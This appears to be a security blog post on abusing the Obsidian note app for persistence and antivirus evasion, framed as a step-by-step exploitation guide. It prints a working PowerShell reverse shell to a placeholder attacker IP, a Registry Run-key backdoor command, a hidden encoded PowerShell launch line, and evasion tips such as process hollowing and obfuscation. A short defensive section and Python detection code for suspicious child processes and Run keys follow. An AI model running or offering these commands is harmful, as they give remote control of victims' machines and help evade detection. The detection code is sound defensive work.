Get Persistence Via Obsidian and Bypass Antivirus

Obsidian, a note-taking application, can be abused to gain persistence on a target system while bypassing antivirus products such as Bitdefender and Padvish. The technique relies on a hidden reverse shell and may use Beacon Object Files (BOF) for evasion.

You Should Know:

Step-by-Step Exploitation Process

1. Initial Setup

  • Install Obsidian on the target machine (if not already present).
  • Prepare a malicious markdown file containing embedded reverse shell code.

2. Crafting the Malicious Payload

  • Use a PowerShell or Python-based reverse shell script.
  • Encode the payload to evade signature-based detection.

Example PowerShell reverse shell (to be Base64-encoded before use):

$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

– Encode with:

3. Bypassing Antivirus

  • Use Process Hollowing or Process Injection to execute the payload within Obsidian’s process.
  • Leverage BOF (Beacon Object Files) for in-memory execution if targeting Bitdefender.

4. Maintaining Persistence

  • Modify Obsidian’s startup scripts or plugins to execute the payload on launch.
  • Use Windows Registry for persistence:
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "ObsidianBackdoor" /t REG_SZ /d "C:\path\to\obsidian.exe --malicious-argument"

5. Hidden Execution

  • Run the reverse shell in a hidden window:
    start /B powershell -nop -w hidden -encodedcommand <BASE64_PAYLOAD>

Evasion Techniques

  • Obfuscation: Use tools like Invoke-Obfuscation for PowerShell scripts.
  • Living-off-the-Land (LOLBAS): Leverage legitimate binaries (e.g., msbuild.exe) for execution.
  • Time-based Execution: Delay payload execution using `timeout` or scheduled tasks.

What Undercode Says

This technique demonstrates how legitimate applications like Obsidian can be weaponized for persistence and evasion. Security teams should:
– Monitor for unusual child processes spawned by note-taking apps.
– Inspect Registry Run-key modifications and unsigned plugin loads.
– Use YARA rules to detect malicious markdown files.
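The first two detection points above, as an added example that is not part of the original post: it runs over constructed Sysmon-style process-creation events and constructed HKCU Run values (field names follow Sysmon Event ID 1; all paths and values are made up) and flags a note-taking app spawning a script host with hidden/encoded flags, and a Run value that launches the note app at logon.

```python
import re
# Constructed Sysmon-style process-creation events (assumption: Sysmon Event ID 1
# field names; paths and command lines are made up for this example).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -encodedcommand <BASE64_PAYLOAD>"},
    {"ParentImage": r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe",
     "Image": r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe",
     "CommandLine": '"Obsidian.exe" --type=renderer'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

# Constructed HKCU ...\CurrentVersion\Run values as (value name, data) pairs.
SAMPLE_RUN_VALUES = [
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("ObsidianBackdoor", r"C:\path\to\obsidian.exe --malicious-argument"),
]

NOTE_APPS = {"obsidian.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "msbuild.exe"}
# Flags the hidden-execution one-liner relies on: encoded command, hidden window, no profile.
SUSPICIOUS_FLAGS = re.compile(r"-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|-nop\b", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_child_processes(events):
    """Return (child, reason) for each event where a note app spawned a script host."""
    hits = []
    for ev in events:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent in NOTE_APPS and child in SCRIPT_HOSTS:
            reason = "script host spawned by note app"
            if SUSPICIOUS_FLAGS.search(ev["CommandLine"]):
                reason += " with hidden/encoded flags"
            hits.append((child, reason))
    return hits

def flag_run_keys(values):
    """Return (value name, arguments) for Run values that launch a note app at logon."""
    hits = []
    for name, data in values:
        m = re.match(r'"?([^"]+?\.exe)"?\s*(.*)', data, re.I)
        if m and basename(m.group(1)) in NOTE_APPS:
            hits.append((name, m.group(2).strip()))
    return hits
```

In production the events would come from a Sysmon or EDR feed and the Run values from a registry export; the Electron renderer child in the sample shows why the check keys on script hosts rather than on any child of the app.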

Expected Output:

A stealthy reverse shell executing within Obsidian’s process, evading AV detection, and maintaining persistence through registry or startup scripts.

Prediction

As attackers increasingly abuse legitimate software, EDR solutions will likely enhance behavioral detection for trusted applications, focusing on anomalous process injections and script executions.

References:

Reported By: Hassan Sohrabian – Hackers Feeds